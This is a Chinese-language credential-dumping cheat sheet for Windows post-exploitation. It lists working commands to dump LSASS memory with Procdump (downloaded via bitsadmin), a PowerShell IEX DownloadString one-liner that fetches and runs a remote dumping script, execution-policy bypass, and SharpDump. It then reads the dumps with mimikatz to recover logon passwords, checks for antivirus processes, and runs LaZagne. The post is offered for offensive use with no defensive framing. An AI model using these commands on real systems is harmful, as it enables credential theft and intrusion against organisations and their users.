1、前提条件
必须已经事先拿到目标机器的管理权限,且看到有管理员的登录会话
2、Prodump
直接指定 lsass.exe 进程名进行抓取即可,之后只需把生成的 lsass.dmp 文件拖回本地
cd c:\Windows\Temp
bitsadmin /rawreturn /transfer getfile https://raw.githubusercontent.com/klionsec/CommonTools/master/procdump.exe c:\windows\temp\dump.exe
dump.exe -accepteula -ma lsass.exe lsass.dmp
接着,再在本地用 mimikatz.exe 去加载读取即可[版本保持一致]
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
3、powershell
1、远程执行:
只适用于 2008r2 之后的系统
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp"
tasklist | findstr /c:"egui.exe" /c:"ekrn.exe"
dir c:\windows\Temp | findstr "lsass
同样,之后只需把 lsass_504.dmp 文件拖到本地机器再用 mimikatz.exe 加载读取即可
mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit
2、本地执行
powershell –exec bypass –Command "& {Import-Module 'C:\Tools\Out-Minidump.ps1'; Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp}"
PS: powershell 导 lsass.exe 进程数据差不多文件要比用 prodump 导的小 10M 左右
mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit
4、sharpDump
项目地址:https://github.com/GhostPack/SharpDump
将.sln用MSBuild编译成.exe
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe E:\SharpDump-master\SharpDump.sln /t:Rebuild /p:Configuration=Release
直接运行:
需要线把 bin 重命名为 zip 后缀,然后正常解压出里面的 文件,再给 mimikatz 去读取即可
mimikatz.exe "sekurlsa::minidump debug596" "sekurlsa::logonPasswords full" "exit"
5、LaZagne(python)
项目地址:https://github.com/AlessandroZ/LaZagne/releases
下载直接运行lazgne.exe all
